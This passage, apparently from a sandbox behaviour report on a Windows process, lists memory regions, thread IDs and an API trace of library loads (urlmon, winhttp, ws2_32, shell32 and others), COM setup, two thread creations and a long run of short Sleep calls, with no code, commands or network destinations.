0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13912 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13913 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13914 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13915 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13916 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13917 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13918 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13919 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13920 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13921 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13922 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13923 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13924 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13925 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13926 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13927 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13928 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13929 start_va = 0x580000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13930 start_va = 0x2100000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 13931 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13932 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13933 start_va = 0x590000 end_va = 0x591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 13934 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13935 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13936 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13937 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13938 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13939 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13940 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13941 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13942 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13943 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13944 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13945 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13946 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13947 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13948 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13949 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13950 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13951 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13952 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13953 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000580000" filename = "" Region: id = 13954 start_va = 0x2490000 end_va = 0x24affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002490000" filename = "" Region: id = 13955 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 13956 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Thread: id = 5 os_tid = 0x758 Thread: id = 6 os_tid = 0x13d0 Thread: id = 7 os_tid = 0x1314 Thread: id = 8 os_tid = 0x130c Thread: id = 9 os_tid = 0x12e4 Thread: id = 10 os_tid = 0x12d8 Thread: id = 11 os_tid = 0x107c Thread: id = 12 os_tid = 0xb10 Thread: id = 13 os_tid = 0xcc4 Thread: id = 14 os_tid = 0x448 Thread: id = 15 os_tid = 0x704 Thread: id = 16 os_tid = 0x6ec Thread: id = 17 os_tid = 0x628 Thread: id = 18 os_tid = 0xa30 Thread: id = 19 os_tid = 0xff4 Thread: id = 20 os_tid = 0xfc0 Thread: id = 21 os_tid = 0xec0 Thread: id = 22 os_tid = 0xe58 Thread: id = 23 os_tid = 0xe28 Thread: id = 24 os_tid = 0x908 Thread: id = 25 os_tid = 0x928 Thread: id = 26 os_tid = 0x8bc Thread: id = 27 os_tid = 0x5d4 Thread: id = 28 os_tid = 0x8b0 Thread: id = 29 os_tid = 0xbfc Thread: id = 30 os_tid = 0xbf8 Thread: id = 31 os_tid = 0xb94 Thread: id = 32 os_tid = 0xa9c Thread: id = 33 os_tid = 0x7b4 Thread: id = 34 os_tid = 0x7ac Thread: id = 35 os_tid = 0x7a8 Thread: id = 36 os_tid = 0x774 Thread: id = 37 os_tid = 0x768 Thread: id = 38 os_tid = 0x764 Thread: id = 39 os_tid = 0x75c Thread: id = 40 os_tid = 0x754 Thread: id = 41 os_tid = 0x73c Thread: id = 42 os_tid = 0x728 Thread: id = 43 os_tid = 0x710 Thread: id = 44 os_tid = 0x6f0 Thread: id = 45 os_tid = 0x6d4 Thread: id = 46 os_tid = 0x6d0 Thread: id = 47 os_tid = 0x6c8 Thread: id = 48 os_tid = 0x6b8 Thread: id = 49 os_tid = 0x6b4 Thread: id = 50 os_tid = 0x6a8 Thread: id = 51 os_tid = 0x6a4 Thread: id = 52 os_tid = 0x69c Thread: id = 53 os_tid = 0x68c Thread: id = 54 os_tid = 0x688 Thread: id = 55 os_tid = 0x684 Thread: id = 56 os_tid = 0x650 Thread: id = 57 os_tid = 0x644 Thread: id = 58 os_tid = 0x9f4 [0095.629] LoadLibraryA (lpLibFileName="NTDLL") returned 0x7ffb28b00000 [0095.630] GetProcAddress (hModule=0x7ffb28b00000, lpProcName="RtlExitUserThread") returned 0x7ffb28b5c2a0 [0095.632] RtlCreateHeap (Flags=0x1002, HeapBase=0x0, ReserveSize=0x0, CommitSize=0x0, Lock=0x0, Parameters=0x0) returned 0x9880000 [0096.244] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x10) returned 0x9880830 [0096.245] LoadLibraryA (lpLibFileName="user32") returned 0x7ffb26090000 [0096.245] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9880830) returned 1 [0096.245] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x12) returned 0x9880830 [0096.245] LoadLibraryA (lpLibFileName="advapi32") returned 0x7ffb28a50000 [0096.246] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9880830) returned 1 [0096.246] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x10) returned 0x9880830 [0096.246] LoadLibraryA (lpLibFileName="urlmon") returned 0x7ffb174f0000 [0096.247] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9880830) returned 1 [0096.247] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0xf) returned 0x9880830 [0096.247] LoadLibraryA (lpLibFileName="ole32") returned 0x7ffb281e0000 [0096.247] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9880830) returned 1 [0096.247] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x11) returned 0x9880830 [0096.247] LoadLibraryA (lpLibFileName="winhttp") returned 0x7ffb21040000 [0096.248] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9880830) returned 1 [0096.248] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x10) returned 0x9880830 [0096.248] LoadLibraryA (lpLibFileName="ws2_32") returned 0x7ffb28450000 [0096.248] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9880830) returned 1 [0096.248] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x10) returned 0x9880830 [0096.248] LoadLibraryA (lpLibFileName="dnsapi") returned 0x7ffb23b90000 [0096.249] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9880830) returned 1 [0096.249] RtlAllocateHeap (HeapHandle=0x9880000, Flags=0x8, Size=0x11) returned 0x9880830 [0096.249] LoadLibraryA (lpLibFileName="shell32") returned 0x7ffb267e0000 [0096.250] RtlFreeHeap (HeapHandle=0x9880000, Flags=0x0, BaseAddress=0x9880830) returned 1 [0096.250] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffb27e00000 [0096.251] GetProcAddress (hModule=0x7ffb27e00000, lpProcName="CoInitializeEx") returned 0x7ffb27e62c50 [0096.251] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffb27e00000 [0096.252] GetProcAddress (hModule=0x7ffb27e00000, lpProcName="CoInitializeSecurity") returned 0x7ffb27e35fe0 [0096.252] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffb27e00000 [0096.253] GetProcAddress (hModule=0x7ffb27e00000, lpProcName="CoCreateInstance") returned 0x7ffb27e9fb70 [0096.253] LoadLibraryA (lpLibFileName="api-ms-win-core-com-l1-1-0") returned 0x7ffb27e00000 [0096.254] GetProcAddress (hModule=0x7ffb27e00000, lpProcName="CoUninitialize") returned 0x7ffb27e61540 [0096.255] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x523d94, lpParameter=0x2830000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xff8 [0096.255] CloseHandle (hObject=0xff8) returned 1 [0096.255] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x523e70, lpParameter=0x2830000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xff8 [0096.256] CloseHandle (hObject=0xff8) returned 1 [0096.256] Sleep (dwMilliseconds=0xa) [0096.421] Sleep (dwMilliseconds=0xa) [0096.537] Sleep (dwMilliseconds=0xa) [0096.548] Sleep (dwMilliseconds=0xa) [0096.559] Sleep (dwMilliseconds=0xa) [0096.569] Sleep (dwMilliseconds=0xa) [0096.585] Sleep (dwMilliseconds=0xa) [0096.596] Sleep (dwMilliseconds=0xa) [0096.607] Sleep (dwMilliseconds=0xa) [0096.617] Sleep (dwMilliseconds=0xa) [0096.630] Sleep (dwMilliseconds=0xa) [0096.641] Sleep (dwMilliseconds=0xa) [0096.651] Sleep (dwMilliseconds=0xa) [0096.877] Sleep (dwMilliseconds=0xa) [0096.903] Sleep (dwMilliseconds=0xa) [0097.011] Sleep (dwMilliseconds=0xa) [0097.022] Sleep (dwMilliseconds=0xa) [0097.032] Sleep (dwMilliseconds=0xa) [0097.043] Sleep (dwMilliseconds=0xa) [0097.053] Sleep (dwMilliseconds=0xa) [0097.064] Sleep (dwMilliseconds=0xa) [0097.074] Sleep (dwMilliseconds=0xa) [0097.085] Sleep (dwMilliseconds=0xa) [0097.095] Sleep (dwMilliseconds=0xa) [0097.106] Sleep (dwMilliseconds=0xa) [0097.116] Sleep (dwMilliseconds=0xa) [0097.126] Sleep (dwMilliseconds=0xa) [0097.233] Sleep (dwMilliseconds=0xa) [0097.243] Sleep (dwMilliseconds=0xa) [0097.254] Sleep (dwMilliseconds=0xa) [0097.270] Sleep (dwMilliseconds=0xa) [0097.281] Sleep (dwMilliseconds=0xa) [0097.396] Sleep (dwMilliseconds=0xa) [0097.481] Sleep (dwMilliseconds=0xa) [0097.492] Sleep (dwMilliseconds=0xa) [0097.502] Sleep (dwMilliseconds=0xa) [0097.513] Sleep (dwMilliseconds=0xa) [0097.523] Sleep (dwMilliseconds=0xa) [0097.535] Sleep (dwMilliseconds=0xa) [0097.545] Sleep (dwMilliseconds=0xa) [0097.575] Sleep (dwMilliseconds=0xa) [0097.611] Sleep (dwMilliseconds=0xa) [0097.622] Sleep (dwMilliseconds=0xa) [0097.632] Sleep (dwMilliseconds=0xa) [0097.726] Sleep (dwMilliseconds=0xa) [0097.738] Sleep (dwMilliseconds=0xa) [0097.748] Sleep (dwMilliseconds=0xa) [0097.759] Sleep (dwMilliseconds=0xa) [0097.769] Sleep (dwMilliseconds=0xa) [0097.780] Sleep (dwMilliseconds=0xa) [0097.790] Sleep (dwMilliseconds=0xa) [0097.801] Sleep (dwMilliseconds=0xa) [0097.812] Sleep (dwMilliseconds=0xa) [0097.822] Sleep (dwMilliseconds=0xa) [0097.853] Sleep (dwMilliseconds=0xa) [0097.863] Sleep (dwMilliseconds=0xa) [0097.873] Sleep (dwMilliseconds=0xa) [0097.943] Sleep (dwMilliseconds=0xa) [0097.954] Sleep (dwMilliseconds=0xa) [0097.965] Sleep (dwMilliseconds=0xa) [0097.975] Sleep (dwMilliseconds=0xa) [0097.986] Sleep (dwMilliseconds=0xa) [0097.997] Sleep (dwMilliseconds=0xa) [0098.007] Sleep (dwMilliseconds=0xa) [0098.093] Sleep (dwMilliseconds=0xa) [0098.135] Sleep (dwMilliseconds=0xa) [0098.202] Sleep (dwMilliseconds=0xa) [0098.244] Sleep (dwMilliseconds=0xa) [0098.275] Sleep (dwMilliseconds=0xa) [0098.289] Sleep (dwMilliseconds=0xa) [0098.300] Sleep (dwMilliseconds=0xa) [0098.310] Sleep (dwMilliseconds=0xa) [0098.321] Sleep (dwMilliseconds=0xa) [0098.332] Sleep (dwMilliseconds=0xa) [0098.344] Sleep (dwMilliseconds=0xa) [0098.430] Sleep (dwMilliseconds=0xa) [0098.440] Sleep (dwMilliseconds=0xa) [0098.451] Sleep (dwMilliseconds=0xa) [0098.461] Sleep (dwMilliseconds=0xa) [0098.472] Sleep (dwMilliseconds=0xa) [0098.482] Sleep (dwMilliseconds=0xa) [0098.493] Sleep (dwMilliseconds=0xa) [0098.503] Sleep (dwMilliseconds=0xa) [0098.514] Sleep (dwMilliseconds=0xa) [0098.602] Sleep (dwMilliseconds=0xa) [0098.687] Sleep (dwMilliseconds=0xa) [0098.698] Sleep (dwMilliseconds=0xa) [0098.709] Sleep (dwMilliseconds=0xa) [0098.719] Sleep (dwMilliseconds=0xa) [0098.730] Sleep (dwMilliseconds=0xa) [0098.740] Sleep (dwMilliseconds=0xa) [0098.761] Sleep (dwMilliseconds=0xa) [0098.771] Sleep (dwMilliseconds=0xa) [0098.782] Sleep (dwMilliseconds=0xa) [0098.808] Sleep (dwMilliseconds=0xa) [0098.819] Sleep (dwMilliseconds=0xa) [0098.830] Sleep (dwMilliseconds=0xa) [0098.840] Sleep (dwMilliseconds=0xa) [0098.878] Sleep (dwMilliseconds=0xa) [0098.889] Sleep (dwMilliseconds=0xa) [0098.904] Sleep (dwMilliseconds=0xa) [0098.914] Sleep (dwMilliseconds=0xa) [0098.926] Sleep (dwMilliseconds=0xa) [0098.966] Sleep (dwMilliseconds=0xa) [0099.029] Sleep (dwMilliseconds=0xa) [0099.071] Sleep (dwMilliseconds=0xa) [0099.085] Sleep (dwMilliseconds=0xa) [0099.096] Sleep (dwMilliseconds=0xa) [0099.130] Sleep (dwMilliseconds=0xa) [0099.141] Sleep (dwMilliseconds=0xa) [0099.152] Sleep (dwMilliseconds=0xa) [0099.162] Sleep (dwMilliseconds=0xa) [0099.327] Sleep (dwMilliseconds=0xa) [0099.407] Sleep (dwMilliseconds=0xa) [0099.418] Sleep (dwMilliseconds=0xa) [0099.428] Sleep (dwMilliseconds=0xa) [0099.443] Sleep (dwMilliseconds=0xa) [0099.454] Sleep (dwMilliseconds=0xa) [0099.465] Sleep (dwMilliseconds=0xa) [0099.476] Sleep (dwMilliseconds=0xa) [0099.488] Sleep (dwMilliseconds=0xa) [0099.498] Sleep (dwMilliseconds=0xa) [0099.509] Sleep (dwMilliseconds=0xa) [0099.519] Sleep (dwMilliseconds=0xa) [0099.530] Sleep (dwMilliseconds=0xa) [0099.540] Sleep (dwMilliseconds=0xa) [0099.622] Sleep (dwMilliseconds=0xa) [0099.727] Sleep (dwMilliseconds=0xa) [0099.738] Sleep (dwMilliseconds=0xa) [0099.748] Sleep (dwMilliseconds=0xa) [0099.759] Sleep (dwMilliseconds=0xa) [0099.769] Sleep (dwMilliseconds=0xa) [0099.780] Sleep (dwMilliseconds=0xa) [0099.813] Sleep (dwMilliseconds=0xa) [0099.824] Sleep (dwMilliseconds=0xa) [0099.834] Sleep (dwMilliseconds=0xa) [0099.923] Sleep (dwMilliseconds=0xa) [0099.933] Sleep (dwMilliseconds=0xa) [0099.944] Sleep (dwMilliseconds=0xa) [0100.036] Sleep (dwMilliseconds=0xa) [0100.047] Sleep (dwMilliseconds=0xa) [0100.057] Sleep (dwMilliseconds=0xa) [0100.147] Sleep (dwMilliseconds=0xa) [0100.317] Sleep (dwMilliseconds=0xa) [0100.577] Sleep (dwMilliseconds=0xa) [0100.692] Sleep (dwMilliseconds=0xa) [0100.770] Sleep (dwMilliseconds=0xa) [0100.790] Sleep (dwMilliseconds=0xa) [0100.801] Sleep (dwMilliseconds=0xa) [0100.811] Sleep (dwMilliseconds=0xa) [0100.822] Sleep (dwMilliseconds=0xa) [0100.913] Sleep (dwMilliseconds=0xa) [0100.940] Sleep (dwMilliseconds=0xa) [0100.950] Sleep (dwMilliseconds=0xa) [0100.961] Sleep (dwMilliseconds=0xa) [0101.014] Sleep (dwMilliseconds=0xa) [0101.026] Sleep (dwMilliseconds=0xa) [0101.171] Sleep (dwMilliseconds=0xa) [0101.218] Sleep (dwMilliseconds=0xa) [0101.241] Sleep (dwMilliseconds=0xa) [0101.302] Sleep (dwMilliseconds=0xa) [0101.313] Sleep (dwMilliseconds=0xa) [0101.324] Sleep (dwMilliseconds=0xa) [0101.336] Sleep (dwMilliseconds=0xa) [0101.347] Sleep (dwMilliseconds=0xa) [0101.358] Sleep (dwMilliseconds=0xa) [0101.368] Sleep (dwMilliseconds=0xa) [0101.390] Sleep (dwMilliseconds=0xa) [0101.476] Sleep (dwMilliseconds=0xa) [0101.548] Sleep (dwMilliseconds=0xa) [0101.580] Sleep (dwMilliseconds=0xa) [0101.606] Sleep (dwMilliseconds=0xa) [0101.711] Sleep (dwMilliseconds=0xa) [0101.815] Sleep (dwMilliseconds=0xa) [0101.825] Sleep (dwMilliseconds=0xa) [0101.837] Sleep (dwMilliseconds=0xa) [0101.848] Sleep (dwMilliseconds=0xa) [0101.859] Sleep (dwMilliseconds=0xa) [0101.870] Sleep (dwMilliseconds=0xa) [0101.880] Sleep (dwMilliseconds=0xa) [0101.891] Sleep (dwMilliseconds=0xa) [0101.902] Sleep (dwMilliseconds=0xa) [0101.912] Sleep (dwMilliseconds=0xa) [0102.003] Sleep (dwMilliseconds=0xa) [0102.102] Sleep (dwMilliseconds=0xa) [0102.192] Sleep (dwMilliseconds=0xa) [0102.202] Sleep (dwMilliseconds=0xa) [0102.213] Sleep (dwMilliseconds=0xa) [0102.223] Sleep (dwMilliseconds=0xa) [0102.301] Sleep (dwMilliseconds=0xa) [0102.312] Sleep (dwMilliseconds=0xa) [0102.322] Sleep (dwMilliseconds=0xa) [0102.334] Sleep (dwMilliseconds=0xa) [0102.344] Sleep (dwMilliseconds=0xa) [0102.355] Sleep (dwMilliseconds=0xa) [0102.499] Sleep (dwMilliseconds=0xa) [0102.521] Sleep (dwMilliseconds=0xa) [0102.532] Sleep (dwMilliseconds=0xa) [0102.542] Sleep (dwMilliseconds=0xa) [0102.600] Sleep (dwMilliseconds=0xa) [0102.610] Sleep (dwMilliseconds=0xa) [0102.621] Sleep (dwMilliseconds=0xa) [0102.632] Sleep (dwMilliseconds=0xa) [0102.643] Sleep (dwMilliseconds=0xa) [0102.743] Sleep (dwMilliseconds=0xa) [0102.777] Sleep (dwMilliseconds=0xa) [0102.787] Sleep (dwMilliseconds=0xa) [0102.798] Sleep (dwMilliseconds=0xa) [0102.859] Sleep (dwMilliseconds=0xa) [0102.875] Sleep (dwMilliseconds=0xa) [0102.891] Sleep (dwMilliseconds=0xa) [0102.901] Sleep (dwMilliseconds=0xa) [0102.929] Sleep (dwMilliseconds=0xa) [0102.940] Sleep (dwMilliseconds=0xa) [0102.956] Sleep (dwMilliseconds=0xa) [0103.011] Sleep (dwMilliseconds=0xa) [0103.022] Sleep (dwMilliseconds=0xa) [0103.032] Sleep (dwMilliseconds=0xa) [0103.043] Sleep (dwMilliseconds=0xa) [0103.054] Sleep (dwMilliseconds=0xa) [0103.064] Sleep (dwMilliseconds=0xa) [0103.076] Sleep (dwMilliseconds=0xa) [0103.087] Sleep (dwMilliseconds=0xa) [0103.157] Sleep (dwMilliseconds=0xa) [0103.240] Sleep (dwMilliseconds=0xa) [0103.366] Sleep (dwMilliseconds=0xa) [0103.410] Sleep (dwMilliseconds=0xa) [0103.422] Sleep (dwMilliseconds=0xa) [0103.433] Sleep (dwMilliseconds=0xa) [0103.495] Sleep (dwMilliseconds=0xa) [0103.506] Sleep (dwMilliseconds=0xa) [0103.517] Sleep (dwMilliseconds=0xa) [0103.528] Sleep (dwMilliseconds=0xa) [0103.548] Sleep (dwMilliseconds=0xa) [0103.559] Sleep (dwMilliseconds=0xa) [0103.569] Sleep (dwMilliseconds=0xa) [0103.685] Sleep (dwMilliseconds=0xa) [0103.728] Sleep (dwMilliseconds=0xa) [0103.739] Sleep (dwMilliseconds=0xa) [0103.749] Sleep (dwMilliseconds=0xa) [0103.769] Sleep (dwMilliseconds=0xa) [0103.780] Sleep (dwMilliseconds=0xa) [0103.790] Sleep (dwMilliseconds=0xa) [0103.801] Sleep (dwMilliseconds=0xa) [0103.812] Sleep (dwMilliseconds=0xa) [0103.840] Sleep (dwMilliseconds=0xa) [0103.912] Sleep (dwMilliseconds=0xa) [0103.977] Sleep (dwMilliseconds=0xa) [0103.988] Sleep (dwMilliseconds=0xa) [0103.999] Sleep (dwMilliseconds=0xa) [0104.010] Sleep (dwMilliseconds=0xa) [0104.020] Sleep (dwMilliseconds=0xa) [0104.031] Sleep (dwMilliseconds=0xa) [0104.041] Sleep (dwMilliseconds=0xa) [0104.052] Sleep (dwMilliseconds=0xa) [0104.063] Sleep (dwMilliseconds=0xa) [0104.073] Sleep (dwMilliseconds=0xa) [0104.084] Sleep (dwMilliseconds=0xa) [0104.094] Sleep (dwMilliseconds=0xa) [0104.337] Sleep (dwMilliseconds=0xa) [0104.351] Sleep (dwMilliseconds=0xa) [0104.362] Sleep (dwMilliseconds=0xa) [0104.394] Sleep (dwMilliseconds=0xa) [0104.467] Sleep (dwMilliseconds=0xa) [0104.477] Sleep (dwMilliseconds=0xa) [0104.488] Sleep (dwMilliseconds=0xa) [0104.499] Sleep (dwMilliseconds=0xa) [0104.528] Sleep (dwMilliseconds=0xa) [0104.539] Sleep (dwMilliseconds=0xa) [0104.550] Sleep (dwMilliseconds=0xa) [0104.658] Sleep (dwMilliseconds=0xa) [0104.677] Sleep (dwMilliseconds=0xa) [0104.687] Sleep (dwMilliseconds=0xa) [0104.706] Sleep (dwMilliseconds=0xa) [0104.771] Sleep (dwMilliseconds=0xa) [0104.804] Sleep (dwMilliseconds=0xa) [0104.814] Sleep (dwMilliseconds=0xa) [0104.825] Sleep (dwMilliseconds=0xa) [0104.835] Sleep (dwMilliseconds=0xa) [0104.846] Sleep (dwMilliseconds=0xa) [0104.856] Sleep (dwMilliseconds=0xa) [0104.867] Sleep (dwMilliseconds=0xa) [0104.910] Sleep (dwMilliseconds=0xa) [0104.921] Sleep (dwMilliseconds=0xa) [0104.931] Sleep (dwMilliseconds=0xa) [0104.962] Sleep (dwMilliseconds=0xa) [0104.976] Sleep (dwMilliseconds=0xa) [0105.059] Sleep (dwMilliseconds=0xa) [0105.123] Sleep (dwMilliseconds=0xa) [0105.330] Sleep (dwMilliseconds=0xa) [0105.355] Sleep (dwMilliseconds=0xa) [0105.369] Sleep (dwMilliseconds=0xa) [0105.396] Sleep (dwMilliseconds=0xa) [0105.406] Sleep (dwMilliseconds=0xa) [0105.417] Sleep (dwMilliseconds=0xa) [0105.427] Sleep (dwMilliseconds=0xa) [0105.513] Sleep (dwMilliseconds=0xa) [0105.593] Sleep (dwMilliseconds=0xa) [0105.668] Sleep (dwMilliseconds=0xa) [0105.679] Sleep (dwMilliseconds=0xa) [0105.689] Sleep (dwMilliseconds=0xa) [0105.700] Sleep (dwMilliseconds=0xa) [0105.711] Sleep (dwMilliseconds=0xa) [0105.721] Sleep (dwMilliseconds=0xa) [0105.732] Sleep (dwMilliseconds=0xa) [0105.742] Sleep (dwMilliseconds=0xa) [0105.753] Sleep (dwMilliseconds=0xa) [0105.764] Sleep (dwMilliseconds=0xa) [0105.896] Sleep (dwMilliseconds=0xa) [0105.984] Sleep (dwMilliseconds=0xa) [0106.006] Sleep (dwMilliseconds=0xa) [0106.022] Sleep (dwMilliseconds=0xa) [0106.033] Sleep (dwMilliseconds=0xa) [0106.043] Sleep (dwMilliseconds=0xa) [0106.064] Sleep (dwMilliseconds=0xa) [0106.111] Sleep (dwMilliseconds=0xa) [0106.121] Sleep (dwMilliseconds=0xa) [0106.132] Sleep (dwMilliseconds=0xa) [0106.143] Sleep (dwMilliseconds=0xa) [0106.154] Sleep (dwMilliseconds=0xa) [0106.165] Sleep (dwMilliseconds=0xa) [0106.266] Sleep (dwMilliseconds=0xa) [0106.329] Sleep (dwMilliseconds=0xa) [0106.339] Sleep (dwMilliseconds=0xa) [0106.559] Sleep (dwMilliseconds=0xa) [0106.653] Sleep (dwMilliseconds=0xa) [0106.702] Sleep (dwMilliseconds=0xa) [0106.777] Sleep (dwMilliseconds=0xa) [0106.818] Sleep (dwMilliseconds=0xa) [0106.829] Sleep (dwMilliseconds=0xa) [0106.839] Sleep (dwMilliseconds=0xa) [0106.850] Sleep (dwMilliseconds=0xa) [0106.860] Sleep (dwMilliseconds=0xa) [0106.871] Sleep (dwMilliseconds=0xa) [0106.881] Sleep (dwMilliseconds=0xa) [0106.892] Sleep (dwMilliseconds=0xa) [0106.902] Sleep (dwMilliseconds=0xa) [0106.913] Sleep (dwMilliseconds=0xa) [0106.982] Sleep (dwMilliseconds=0xa) [0107.094] Sleep (dwMilliseconds=0xa) [0107.114] Sleep (dwMilliseconds=0xa) [0107.138] Sleep (dwMilliseconds=0xa) [0107.149] Sleep (dwMilliseconds=0xa) [0107.165] Sleep (dwMilliseconds=0xa) [0107.175] Sleep (dwMilliseconds=0xa) [0107.186] Sleep (dwMilliseconds=0xa) [0107.266] Sleep (dwMilliseconds=0xa) [0107.362] Sleep 